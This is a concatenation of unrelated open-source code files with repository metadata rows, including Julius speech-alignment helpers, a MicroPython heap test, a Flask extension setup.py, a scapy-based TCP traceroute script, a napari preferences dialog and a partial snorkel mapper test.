s = s.replace('ざ',' z a')
s = s.replace('じ',' j i')
s = s.replace('ず',' z u')
s = s.replace('ぜ',' z e')
s = s.replace('ぞ',' z o')
s = s.replace('だ',' d a')
s = s.replace('ぢ',' j i')
s = s.replace('づ',' z u')
s = s.replace('で',' d e')
s = s.replace('ど',' d o')
s = s.replace('ば',' b a')
s = s.replace('び',' b i')
s = s.replace('ぶ',' b u')
s = s.replace('べ',' b e')
s = s.replace('ぼ',' b o')
s = s.replace('ぱ',' p a')
s = s.replace('ぴ',' p i')
s = s.replace('ぷ',' p u')
s = s.replace('ぺ',' p e')
s = s.replace('ぽ',' p o')
s = s.replace('や',' y a')
s = s.replace('ゆ',' y u')
s = s.replace('よ',' y o')
s = s.replace('わ',' w a')
s = s.replace('を',' o')
s = s.replace('ん',' N')
s = s.replace('っ',' q')
s = s.replace('ー',':')
s = s.replace('ぁ',' a')
s = s.replace('ぃ',' i')
s = s.replace('ぅ',' u')
s = s.replace('ぇ',' e')
s = s.replace('ぉ',' o')
s = s.replace('ゎ',' w a')
s = s[1:]
s = re.sub(r':+', ':', s)
return s
def gen_julius_dict_1st(text_symbols: [str], word_phones: [str]) -> str:
'''テキストのシンボルと読みの音素のJulius dictファイルの中身を生成
args:
text_symbols ([str]): 単語のシンボル
['今回', 'は']
word_phones ([str]): 単語の音素系列
['k o N k a i', 'w a']
returns:
(str): Juliusのdictファイルの中身
'''
tmp = []
finit = len(text_symbols)
for i, zipped in enumerate(zip(text_symbols, word_phones)):
tmp.append('{}\t[{}]\t{}'.format(i*2, *zipped))
if i + 1 != finit:
tmp.append('{}\t[{}]\t{}'.format(i*2+1, 'sp_{}'.format(i), 'sp'))
# append sp and Start, End symbol
tmp.append('{}\t[{}]\t{}'.format(i*2+1, '<s>', 'silB'))
tmp.append('{}\t[{}]\t{}'.format((i+1)*2, '</s>', 'silE'))
return '\n'.join(tmp) + '\n'
def gen_julius_dfa(number_of_words: int) -> str:
'''単語数から遷移のためのJuliusのdfaファイルの中身を生成
args:
number_of_words (int): 遷移する単語の単語数
returns:
(str): Juliusのdfaファイルの中身
'''
i = 0
current_word = number_of_words - 3
isLast = False
tmp = []
while True:
if i == 0:
tmp.append('{} {} {} {} {}'.format(i, number_of_words - 1, i + 1, 0, 1))
i += 1
elif i > 0 and not isLast:
tmp.append('{} {} {} {} {}'.format(i, current_word, i + 1, 0, 0))
current_word -= 1
isLast = current_word == -1
i += 1
elif i > 0 and isLast:
tmp.append('{} {} {} {} {}'.format(i, i - 1, i + 1, 0, 0))
tmp.append('{} {} {} {} {}'.format(i + 1, -1, -1, 1, 0))
break
return '\n'.join(tmp) + '\n'
def gen_julius_dict_2nd(phone_seqence: str) -> str:
'''音素系列から強制アライメントのためのdictファイルの中身を生成
args:
phone_seqence (str):
'k o N k a i w a '
returns:
(str): Juliusのdictファイルの中身
'''
return '\n'.join([
'0\t[w_0]\tsilB',
'1\t[w_1]\t{}'.format(phone_seqence),
'2\t[w_2]\tsilE',
]) + '\n'
def gen_julius_aliment_dfa() -> str:
'''強制アライメント用のdfaファイルの中身を生成
returns:
(str): Juliusのdfaファイルの中身
'''
return '\n'.join([
'0 2 1 0 1',
'1 1 2 0 0',
'2 0 3 0 0',
'3 -1 -1 1 0'
]) + '\n'
def julius_sp_insert(target_wav_file: str, aliment_file_signiture: str, model_path: str = None) -> [str]:
julius_args = {
'-h': str(
JULIUS_ROOT / 'model' / 'phone_m' / 'jnas-mono-16mix-gid.binhmm'
) if model_path is None else model_path,
'-input': 'file',
'-debug':'',
'-gram': aliment_file_signiture,
}
file_echo_p = subprocess.Popen(['echo', target_wav_file], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
julius_p = subprocess.Popen(' '.join([str(JULIUS_ROOT / 'bin' / get_os_dependent_directory() / get_os_dependent_exec()),
*list(chain.from_iterable([[k, v] for k, v in julius_args.items()]))]).split(), stdin=file_echo_p.stdout, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
file_echo_p.stdout.close()
return julius_p.communicate()[0].decode('utf-8').split('\n')
def get_sp_inserted_text(raw_output: str, debug_symbol='') -> (str, [int]):
'''デコード結果からsp挿入後のテキストとspのインデックスを取得する
args:
raw_output: `julius_sp_insert`の出力
returns:
Tuple(str, [int]): デコード結果とspのindex
'''
r = re.compile('<s> (.*) </s>')
pass1_best = next(s for s in raw_output if s.startswith('pass1_best'))
matched = r.search(pass1_best)
if matched is None:
logger.warning('Failed Decoding Text [{}]'.format(debug_symbol))
raise Exception("Decode Failed")
return (re.sub('sp_[\d+]', '<sp>', matched.group(1)), [int(s.split('_')[1]) for s in matched.group().split() if 'sp_' in s])
def get_sp_inserterd_phone_seqence(raw_output: str, debug_symbol='') -> str:
pass1_best_phonemeseq = next(s for s in raw_output if s.startswith('pass1_best_phonemeseq'))
complete_re = re.compile('silB \| (.*) \| silE')
failed_re_1 = re.compile('silE \| (.*) \| silB')
failed_re_2 = re.compile('silE \| (.*)')
if complete_re.search(pass1_best_phonemeseq) is not None:
matched = complete_re.search(pass1_best_phonemeseq)
elif failed_re_1.search(pass1_best_phonemeseq) is not None:
logger.info('Use not correct re to generate Phoneseq [{}]'.format(debug_symbol))
matched = failed_re_1.search(pass1_best_phonemeseq)
elif failed_re_2.search(pass1_best_phonemeseq) is not None:
logger.info('Use not correct re to generate Phoneseq [{}]'.format(debug_symbol))
matched = failed_re_2.search(pass1_best_phonemeseq)
else:
logger.warning('Failed Generate Phoneseq [{}]'.format(debug_symbol))
raise Exception("Decode Failed")
tmp = matched.group(1)
return ' '.join([s.strip() for s in tmp.split('|')])
def julius_phone_alignment(target_wav_file: str, aliment_file_signiture: str, model_path: str = None) -> [str]:
julius_args = {
'-h': str(
JULIUS_ROOT / 'model' / 'phone_m' / 'jnas-mono-16mix-gid.binhmm'
) if model_path is None else model_path,
'-palign':'',
'-input': 'file',
'-gram': aliment_file_signiture,
}
file_echo_p = subprocess.Popen(['echo', target_wav_file], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
julius_p = subprocess.Popen(' '.join([str(JULIUS_ROOT / 'bin'/ get_os_dependent_directory() / get_os_dependent_exec()),
*list(chain.from_iterable([[k, v] for k, v in julius_args.items()]))]).split(), stdin=file_echo_p.stdout, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
file_echo_p.stdout.close()
return julius_p.communicate()[0].decode('utf-8').split('\n')
def get_time_alimented_list(raw_output: str) -> [str]:
r = re.compile('\[\s*(\d+)\s+(\d+)\s*\]\s*[\-]*[\d,\.]+\s*([\w,\:]+)$')
return [
(s.group(1), s.group(2), s.group(3))
for s in map(lambda x: r.search(x), raw_output) if s is not None
]
| 31.501946 | 184 | 0.494998 |
79461f999afead30fb25659ee6f567622c8078e5 | 1,300 | py | Python | tests/micropython/heapalloc_iter.py | PappaPeppar/micropython | ace9fb54053c29574bdf81ffacc5ddcf9d4b45d9 | [
"MIT"
] | 692 | 2016-12-19T23:25:35.000Z | 2022-03-31T14:20:48.000Z | tests/micropython/heapalloc_iter.py | PappaPeppar/micropython | ace9fb54053c29574bdf81ffacc5ddcf9d4b45d9 | [
"MIT"
] | 259 | 2016-12-25T06:38:22.000Z | 2022-03-13T16:38:36.000Z | tests/micropython/heapalloc_iter.py | PappaPeppar/micropython | ace9fb54053c29574bdf81ffacc5ddcf9d4b45d9 | [
"MIT"
] | 228 | 2016-12-19T05:03:30.000Z | 2022-03-22T18:13:00.000Z | # test that iterating doesn't use the heap
try:
import array
except ImportError:
print("SKIP")
raise SystemExit
try:
from micropython import heap_lock, heap_unlock
except (ImportError, AttributeError):
heap_lock = heap_unlock = lambda:0
def do_iter(l):
for i in l:
print(i)
def gen_func():
yield 1
yield 2
# pre-create collections to iterate over
ba = bytearray(b'123')
ar = array.array('H', (123, 456))
t = (1, 2, 3)
l = [1, 2]
d = {1:2}
s = set((1,))
fs = frozenset((1,))
g1 = (100 + x for x in range(2))
g2 = gen_func()
# test containment (both success and failure) with the heap locked
heap_lock()
print(49 in b'123', 255 in b'123')
print(1 in t, -1 in t)
print(1 in l, -1 in l)
print(1 in d, -1 in d)
print(1 in s, -1 in s)
heap_unlock()
# test unpacking with the heap locked
unp0 = unp1 = unp2 = None # preallocate slots for globals
heap_lock()
unp0, unp1, unp2 = t
print(unp0, unp1, unp2)
heap_unlock()
# test certain builtins with the heap locked
heap_lock()
print(all(t))
print(any(t))
print(min(t))
print(max(t))
print(sum(t))
heap_unlock()
# test iterating over collections with the heap locked
heap_lock()
do_iter(b'123')
do_iter(ba)
do_iter(ar)
do_iter(t)
do_iter(l)
do_iter(d)
do_iter(s)
do_iter(fs)
do_iter(g1)
do_iter(g2)
heap_unlock()
| 18.571429 | 66 | 0.678462 |
79461fc621a75c74e9ab55822f88c144a79102d9 | 1,187 | py | Python | setup.py | juztin/flask-tracy | 8a43094f0fced3c216f7b65ad6c5c7a22c14ea25 | [
"BSD-2-Clause"
] | null | null | null | setup.py | juztin/flask-tracy | 8a43094f0fced3c216f7b65ad6c5c7a22c14ea25 | [
"BSD-2-Clause"
] | null | null | null | setup.py | juztin/flask-tracy | 8a43094f0fced3c216f7b65ad6c5c7a22c14ea25 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
from setuptools import setup, find_packages
with open('README.rst') as file:
readme = file.read()
setup(
name='Flask-Tracy',
version='0.1.3',
url='https://github.com/juztin/flask-tracy',
license='BSD',
author='Justin Wilson',
author_email='[email protected]',
description='Logs tracing information on a per-request basis',
long_description=readme,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'Flask>=0.9',
],
classifiers=[
"Development Status :: 4 - Beta",
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3 :: Only",
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 28.95122 | 70 | 0.612468 |
794620094d364f22c6bc531996eff70265d3a0f8 | 489 | py | Python | package/cloudshell/cp/aws/models/ami_deployment_model.py | QualiSystemsLab/AWS-Shell | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | 1 | 2021-05-28T13:55:54.000Z | 2021-05-28T13:55:54.000Z | package/cloudshell/cp/aws/models/ami_deployment_model.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | null | null | null | package/cloudshell/cp/aws/models/ami_deployment_model.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | null | null | null |
class AMIDeploymentModel(object):
def __init__(self):
self.aws_ami_id = '' # type: str
self.min_count = 0 # type: int
self.max_count = 0 # type: int
self.instance_type = '' # type: str
self.private_ip_address = '' # type: str
self.security_group_ids = [] # type: list[str]
self.block_device_mappings = [] # type: list[dict]
self.network_interfaces = [] # type: list[dict]
self.aws_key = '' # type: str
| 34.928571 | 59 | 0.576687 |
7946206fa390ea0f32240ce7ff6d529c7a83a5fb | 2,386 | py | Python | tests/rbac/common/role/propose_task_helper_test.py | kthblmfld/sawtooth-next-directory | 57291f1a7e6ce1dfc11a9c5e2930e8c5ebd31707 | [
"Apache-2.0"
] | null | null | null | tests/rbac/common/role/propose_task_helper_test.py | kthblmfld/sawtooth-next-directory | 57291f1a7e6ce1dfc11a9c5e2930e8c5ebd31707 | [
"Apache-2.0"
] | null | null | null | tests/rbac/common/role/propose_task_helper_test.py | kthblmfld/sawtooth-next-directory | 57291f1a7e6ce1dfc11a9c5e2930e8c5ebd31707 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
"""Test Propose Role Task Helper"""
# pylint: disable=no-member
import logging
import pytest
from rbac.common import protobuf
from rbac.common.crypto.keys import Key
from tests.rbac.common import helper
LOGGER = logging.getLogger(__name__)
@pytest.mark.role
@pytest.mark.library
def test_id():
"""Test get a random proposal id"""
id1 = helper.role.task.propose.id()
id2 = helper.role.task.propose.id()
assert isinstance(id1, str)
assert isinstance(id2, str)
assert len(id1) == 24
assert len(id2) == 24
assert id1 != id2
@pytest.mark.role
@pytest.mark.library
def test_reason():
"""Test get a random reason"""
reason1 = helper.role.task.propose.reason()
reason2 = helper.role.task.propose.reason()
assert isinstance(reason1, str)
assert isinstance(reason2, str)
assert len(reason1) > 4
assert len(reason2) > 4
assert reason1 != reason2
@pytest.mark.role
@pytest.mark.integration
def test_create():
"""A role owner creates an add role task proposal
to add a task to their role"""
proposal, role, role_owner, role_owner_key, task, task_owner, task_owner_key = (
helper.role.task.propose.create()
)
assert isinstance(proposal, protobuf.proposal_state_pb2.Proposal)
assert isinstance(role, protobuf.role_state_pb2.RoleAttributes)
assert isinstance(task, protobuf.task_state_pb2.TaskAttributes)
assert isinstance(role_owner, protobuf.user_state_pb2.User)
assert isinstance(task_owner, protobuf.user_state_pb2.User)
assert isinstance(role_owner_key, Key)
assert isinstance(task_owner_key, Key)
assert proposal.object_id == role.role_id
assert proposal.related_id == task.task_id
| 33.138889 | 84 | 0.713747 |
7946207d02c3bff3ce4ad8aafe7d662a0b52670a | 2,857 | py | Python | scapy/trace.py | mmmonk/crap | 96ba81723f043503e7ed2f96ea727b524d22b83f | [
"MIT"
] | 14 | 2015-01-14T15:53:22.000Z | 2019-06-21T06:15:47.000Z | scapy/trace.py | mmmonk/crap | 96ba81723f043503e7ed2f96ea727b524d22b83f | [
"MIT"
] | 1 | 2018-04-01T08:40:17.000Z | 2020-06-24T10:05:33.000Z | scapy/trace.py | mmmonk/crap | 96ba81723f043503e7ed2f96ea727b524d22b83f | [
"MIT"
] | 12 | 2015-05-13T10:52:04.000Z | 2020-10-07T14:49:37.000Z | #!/usr/bin/env python
# $Id$
"""
Author: <m.lukaszuk(at)gmail.com> 2009
TCP trace route using scapy :)
"""
from scapy.all import conf,IP,TCP,sr1,sniff,send
conf.verb = 0
import random
import re
import sys
my_ttl = 1
target = sys.argv[1]
my_dport = 80
my_seq = random.randint(1024,65500)
my_sport = my_seq
def dec2bin(a,b):
'''
and the question is why it took until release 2.6 of python to realize that
some people actually use binary numbers
'''
if a == 0:
return 0
else:
b.append(a % 2)
dec2bin((int)(a / 2),b)
def TCPflags(a):
'''
prints TCP flags in a nice way
'''
flags = ['F','S','R','P','A','U','E','C']
tcpflags = []
dec2bin(a,tcpflags)
retval=""
i = 0
for val in tcpflags:
if val == 1:
retval = retval+flags[i]
i = i+1
return retval
ip = IP(dst = target)
res = sr1(ip/TCP(sport = my_sport, dport = my_dport, flags = "S", seq = my_seq),retry = 3,timeout = 2)
my_seq = my_seq+1
my_ack = res.seq+1
send(ip/TCP(sport = my_sport, dport = my_dport, flags = "A", seq = my_seq, ack = my_ack))
dttl = res.ttl
dst = res.src
print "got back TCP flags %s and TTL %d from target %s" % (TCPflags(res.payload.flags),dttl,dst)
ttldiff = 255
for defttl in [64,128,255]:
tmp = defttl-dttl
if tmp > 0 and tmp < ttldiff:
ttldiff = tmp
print "%s is probably %d hops away (at least one way ;))" % (dst,ttldiff+1)
data = "GET / HTTP/1.0\nHost: "+target+"\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nAccept: text/html,application/xhtml+xml,application/xml;q = 0.9,*/*;q = 0.8\nAccept-Language: en-us,en;q = 0.5\n"
res = sr1(ip/TCP(sport = my_sport, dport = my_dport, flags = "PA", seq = my_seq, ack = my_ack)/data,retry = 3,timeout = 2)
my_ack = res.seq
my_seq = my_seq+len(data)
data = "Accept-Charset: ISO-8859-2,utf-8;q = 0.7,*;q = 0.7\nPragma: no-cache\nCache-Control: no-cache\n\n"
while 1 == 1:
ip.ttl = my_ttl
rcv = sr1(ip/TCP(sport = my_sport, dport = my_dport, flags = "A", seq = my_seq, ack = my_ack)/data,retry = 2,timeout = 1)
if rcv:
print "%2d : %15s rcv proto %s, TTL %3d" % (my_ttl,rcv.src,rcv.proto,rcv.ttl)
if rcv.proto == 6:
if dttl != rcv.ttl:
print "Probable SYN proxy, SA TTL %d, now TTL %d" % (dttl,rcv.ttl)
print "done, got: TCP flags: %s" % TCPflags(rcv.payload.flags)
if len(rcv.payload.payload) < 10:
cap = sniff(filter = "tcp and port 80 and port %d and host %s" % (my_sport,dst), count = 1,timeout = 5)
for tmp in cap:
if tmp.payload.proto == 6 and len(tmp.payload.payload.payload) < 10:
rcv = tmp.payload
break
if rcv.len > 128:
header = str(rcv.payload.payload)
header = (re.split('\n\s*\n',header,2))[0]
print "\n%s" % header
# rcv.display()
break
if my_ttl > 25:
print "out of TTL ;)"
break
else:
print "%2d : ???.???.???.???" % my_ttl
my_ttl = my_ttl+1
| 25.061404 | 249 | 0.630032 |
794620e9e14ef7b607d1a37b1b9f632aa7b2800b | 7,929 | py | Python | napari/_qt/dialogs/preferences_dialog.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
] | null | null | null | napari/_qt/dialogs/preferences_dialog.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
] | null | null | null | napari/_qt/dialogs/preferences_dialog.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
] | null | null | null | import json
from qtpy.QtCore import QSize, Signal
from qtpy.QtWidgets import (
QDialog,
QHBoxLayout,
QLabel,
QListWidget,
QPushButton,
QStackedWidget,
QVBoxLayout,
QWidget,
)
from ..._vendor.qt_json_builder.qt_jsonschema_form import WidgetBuilder
from ...utils.settings import SETTINGS
from ...utils.translations import trans
class PreferencesDialog(QDialog):
"""Preferences Dialog for Napari user settings."""
resized = Signal(QSize)
def __init__(self, parent=None):
super().__init__(parent)
self._list = QListWidget(self)
self._stack = QStackedWidget(self)
self._list.setObjectName("Preferences")
# Set up buttons
self._button_cancel = QPushButton(trans._("Cancel"))
self._button_ok = QPushButton(trans._("OK"))
self._default_restore = QPushButton(trans._("Restore defaults"))
# Setup
self.setWindowTitle(trans._("Preferences"))
# Layout
left_layout = QVBoxLayout()
left_layout.addWidget(self._list)
left_layout.addStretch()
left_layout.addWidget(self._default_restore)
left_layout.addWidget(self._button_cancel)
left_layout.addWidget(self._button_ok)
main_layout = QHBoxLayout()
main_layout.addLayout(left_layout, 1)
main_layout.addWidget(self._stack, 3)
self.setLayout(main_layout)
# Signals
self._list.currentRowChanged.connect(
lambda index: self._stack.setCurrentIndex(index)
)
self._button_cancel.clicked.connect(self.on_click_cancel)
self._button_ok.clicked.connect(self.on_click_ok)
self._default_restore.clicked.connect(self.restore_defaults)
# Make widget
self.make_dialog()
self._list.setCurrentRow(0)
def resizeEvent(self, event):
"""Override to emit signal."""
self.resized.emit(event.size())
super().resizeEvent(event)
def make_dialog(self):
"""Removes settings not to be exposed to user and creates dialog pages."""
# Because there are multiple pages, need to keep a list of values sets.
self._values_orig_set_list = []
self._values_set_list = []
for _key, setting in SETTINGS.schemas().items():
schema = json.loads(setting['json_schema'])
# Need to remove certain properties that will not be displayed on the GUI
properties = schema.pop('properties')
model = setting['model']
values = model.dict()
napari_config = getattr(model, "NapariConfig", None)
if napari_config is not None:
for val in napari_config.preferences_exclude:
properties.pop(val)
values.pop(val)
schema['properties'] = properties
self._values_orig_set_list.append(set(values.items()))
self._values_set_list.append(set(values.items()))
# Only add pages if there are any properties to add.
if properties:
self.add_page(schema, values)
def restore_defaults(self):
"""Launches dialog to confirm restore settings choice."""
widget = ConfirmDialog(
parent=self,
text=trans._("Are you sure you want to restore default settings?"),
)
widget.valueChanged.connect(self._reset_widgets)
widget.exec_()
def _reset_widgets(self):
"""Deletes the widgets and rebuilds with defaults."""
self.close()
self._list.clear()
for n in range(self._stack.count()):
widget = self._stack.removeWidget(self._stack.currentWidget())
del widget
self.make_dialog()
self._list.setCurrentRow(0)
self.show()
def on_click_ok(self):
"""Keeps the selected preferences saved to SETTINGS."""
self.close()
def on_click_cancel(self):
"""Restores the settings in place when dialog was launched."""
# Need to check differences for each page.
for n in range(self._stack.count()):
# Must set the current row so that the proper set list is updated
# in check differences.
self._list.setCurrentRow(n)
self.check_differences(
self._values_orig_set_list[n],
self._values_set_list[n],
)
self._list.setCurrentRow(0)
self.close()
def add_page(self, schema, values):
"""Creates a new page for each section in dialog.
Parameters
----------
schema : dict
Json schema including all information to build each page in the
preferences dialog.
values : dict
Dictionary of current values set in preferences.
"""
widget = self.build_page_dialog(schema, values)
self._list.addItem(schema["title"])
self._stack.addWidget(widget)
def build_page_dialog(self, schema, values):
"""Builds the preferences widget using the json schema builder.
Parameters
----------
schema : dict
Json schema including all information to build each page in the
preferences dialog.
values : dict
Dictionary of current values set in preferences.
"""
builder = WidgetBuilder()
form = builder.create_form(schema, {})
# set state values for widget
form.widget.state = values
form.widget.on_changed.connect(
lambda d: self.check_differences(
set(d.items()),
self._values_set_list[self._list.currentIndex().row()],
)
)
return form
def check_differences(self, new_set, values_set):
"""Changes settings in settings manager with changes from dialog.
Parameters
----------
new_set : set
The set of new values, with tuples of key value pairs for each
setting.
values_set : set
The old set of values.
"""
page = self._list.currentItem().text().split(" ")[0].lower()
different_values = list(new_set - values_set)
if len(different_values) > 0:
# change the values in SETTINGS
for val in different_values:
try:
setattr(SETTINGS._settings[page], val[0], val[1])
self._values_set_list[
self._list.currentIndex().row()
] = new_set
except: # noqa: E722
continue
class ConfirmDialog(QDialog):
"""Dialog to confirms a user's choice to restore default settings."""
valueChanged = Signal(bool)
def __init__(
self,
parent: QWidget = None,
text: str = "",
):
super().__init__(parent)
# Set up components
self._question = QLabel(self)
self._button_restore = QPushButton(trans._("Restore"))
self._button_cancel = QPushButton(trans._("Cancel"))
# Widget set up
self._question.setText(text)
# Layout
button_layout = QHBoxLayout()
button_layout.addWidget(self._button_cancel)
button_layout.addWidget(self._button_restore)
main_layout = QVBoxLayout()
main_layout.addWidget(self._question)
main_layout.addLayout(button_layout)
self.setLayout(main_layout)
# Signals
self._button_cancel.clicked.connect(self.on_click_cancel)
self._button_restore.clicked.connect(self.on_click_restore)
def on_click_cancel(self):
"""Do not restore defaults and close window."""
self.close()
def on_click_restore(self):
"""Restore defaults and close window."""
SETTINGS.reset()
self.valueChanged.emit(True)
self.close()
| 31.589641 | 85 | 0.607517 |
7946215731e9eb73a53d7891f19f41abb09e211f | 1,084 | py | Python | actions/set_temperature.py | cognifloyd/stackstorm-nest | 43780edf4e13c8bf8996bf20edc04a40aef1caae | [
"Apache-2.0"
] | 164 | 2015-01-17T16:08:33.000Z | 2021-08-03T02:34:07.000Z | actions/set_temperature.py | cognifloyd/stackstorm-nest | 43780edf4e13c8bf8996bf20edc04a40aef1caae | [
"Apache-2.0"
] | 442 | 2015-01-01T11:19:01.000Z | 2017-09-06T23:26:17.000Z | actions/set_temperature.py | cognifloyd/stackstorm-nest | 43780edf4e13c8bf8996bf20edc04a40aef1caae | [
"Apache-2.0"
] | 202 | 2015-01-13T00:37:40.000Z | 2020-11-07T11:30:10.000Z | from lib import actions
class SetTemperatureAction(actions.BaseAction):
def run(self, scale, structure=None, device=None, temp=None, temp_low=None, temp_high=None):
temperature = None
mode = None
# Assume temp if a range is not provided
if temp_low and temp_high:
temperature = (self._convert_temperature(temp_low, scale),
self._convert_temperature(temp_high, scale))
# Automatically flip the mode to 'range' to accept the range temp
mode = 'range'
else:
temperature = self._convert_temperature(temp, scale)
if structure and device:
nest = self._get_device(structure, device)
if mode:
nest.mode = mode
nest.temperature = temperature
else:
for structure in self._nest.structures:
for device in structure.devices:
if mode:
device.mode = mode
device.temperature = temperature
return temperature
| 34.967742 | 96 | 0.581181 |
794622f56774cfa1a43648f82c76f4a033cfb786 | 581 | py | Python | bakkes_rcon/types.py | theY4Kman/bakkes-rcon | 99fad6d56b7538dc600ca5ee0deba47416429863 | [
"MIT"
] | 2 | 2021-11-11T17:20:11.000Z | 2022-01-31T22:05:55.000Z | bakkes_rcon/types.py | theY4Kman/bakkes-rcon | 99fad6d56b7538dc600ca5ee0deba47416429863 | [
"MIT"
] | null | null | null | bakkes_rcon/types.py | theY4Kman/bakkes-rcon | 99fad6d56b7538dc600ca5ee0deba47416429863 | [
"MIT"
] | null | null | null | from typing import Literal, TypeAlias, TypedDict
RawOptionalStr: TypeAlias = str | Literal['none']
RawBool: TypeAlias = Literal['true', 'false']
class RawInventoryItem(TypedDict):
product_id: int
name: str
slot: str
paint: RawOptionalStr
certification: RawOptionalStr
certification_value: int
rank_label: RawOptionalStr
quality: str
crate: str
amount: int # seems to only ever be 1
instance_id: int
special_edition: RawOptionalStr
blueprint_item_id: int
blueprint_item: str
blueprint_cost: int
tradeable: RawBool
| 24.208333 | 49 | 0.717728 |
7946232d31b7065f58fb729034a9f8bcb98900b0 | 13,778 | py | Python | test/map/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | [
"Apache-2.0"
] | 1 | 2020-06-06T05:04:12.000Z | 2020-06-06T05:04:12.000Z | test/map/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | [
"Apache-2.0"
] | null | null | null | test/map/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | [
"Apache-2.0"
] | 1 | 2021-04-25T21:19:21.000Z | 2021-04-25T21:19:21.000Z | import unittest
from types import SimpleNamespace
from typing import Any, Optional
import numpy as np
import pandas as pd
import spacy
from snorkel.map import Mapper, lambda_mapper
from snorkel.map.core import get_hashable
from snorkel.types import DataPoint, FieldMap
class SplitWordsMapper(Mapper):
def __init__(
self, name: str, text_field: str, lower_field: str, words_field: str
) -> None:
super().__init__(
name, dict(text=text_field), dict(lower=lower_field, words=words_field)
)
def run(self, text: str) -> FieldMap: # type: ignore
return dict(lower=text.lower(), words=text.split())
class SplitWordsMapperDefaultArgs(Mapper):
def run(self, text: str) -> FieldMap: # type: ignore
return dict(lower=text.lower(), words=text.split())
class MapperReturnsNone(Mapper):
def run(self, text: str) -> Optional[FieldMap]: # type: ignore
return None
class MapperWithArgs(Mapper):
def run(self, text: str, *args: Any) -> Optional[FieldMap]: # type: ignore
return None
class MapperWithKwargs(Mapper):
def run(self, text: str, **kwargs: Any) -> Optional[FieldMap]: # type: ignore
return None
class MapperWithPre(Mapper):
def run(self, num_squared: float) -> Optional[FieldMap]: # type: ignore
return dict(double_num_squared=2 * num_squared)
class MapperWithPre2(Mapper):
def run(self, double_num_squared: float) -> Optional[FieldMap]: # type: ignore
return dict(double_num_squared_plus_1=double_num_squared + 1)
class SquareHitTracker:
def __init__(self):
self.n_hits = 0
def __call__(self, x: float) -> float:
self.n_hits += 1
return x ** 2
@lambda_mapper()
def square(x: DataPoint) -> DataPoint:
x.num_squared = x.num ** 2
return x
@lambda_mapper()
def modify_in_place(x: DataPoint) -> DataPoint:
x.d["my_key"] = 0
x.d_new = x.d
return x
class TestMapperCore(unittest.TestCase):
def _get_x(self, num=8, text="Henry has fun") -> SimpleNamespace:
return SimpleNamespace(num=num, text=text)
def _get_x_dict(self) -> SimpleNamespace:
return SimpleNamespace(num=8, d=dict(my_key=1))
def test_numeric_mapper(self) -> None:
x_mapped = square(self._get_x())
# NB: not using `self.assertIsNotNone` due to mypy
# See https://github.com/python/mypy/issues/5088
assert x_mapped is not None
x_expected = SimpleNamespace(num=8, text="Henry has fun", num_squared=64)
self.assertEqual(x_mapped, x_expected)
def test_text_mapper(self) -> None:
split_words = SplitWordsMapper(
"split_words", "text", "text_lower", "text_words"
)
x_mapped = split_words(self._get_x())
assert x_mapped is not None
x_expected = SimpleNamespace(
num=8,
text="Henry has fun",
text_lower="henry has fun",
text_words=["Henry", "has", "fun"],
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_same_field(self) -> None:
split_words = SplitWordsMapper("split_words", "text", "text", "text_words")
x = self._get_x()
x_mapped = split_words(x)
self.assertEqual(x, self._get_x())
assert x_mapped is not None
x_expected = SimpleNamespace(
num=8, text="henry has fun", text_words=["Henry", "has", "fun"]
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_default_args(self) -> None:
split_words = SplitWordsMapperDefaultArgs("split_words")
x_mapped = split_words(self._get_x())
assert x_mapped is not None
x_expected = SimpleNamespace(
num=8,
text="Henry has fun",
lower="henry has fun",
words=["Henry", "has", "fun"],
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_in_place(self) -> None:
x = self._get_x_dict()
x_mapped = modify_in_place(x)
self.assertEqual(x, self._get_x_dict())
assert x_mapped is not None
x_expected = SimpleNamespace(num=8, d=dict(my_key=0), d_new=dict(my_key=0))
self.assertEqual(x_mapped, x_expected)
def test_mapper_returns_none(self) -> None:
mapper = MapperReturnsNone("none_mapper")
x_mapped = mapper(self._get_x())
self.assertIsNone(x_mapped)
def test_mapper_pre(self) -> None:
mapper_no_pre = MapperWithPre("pre_mapper")
x = self._get_x(3)
with self.assertRaises(AttributeError):
x_mapped = mapper_no_pre(x)
mapper_pre = MapperWithPre("pre_mapper", pre=[square])
x = self._get_x(3)
x_mapped = mapper_pre(x)
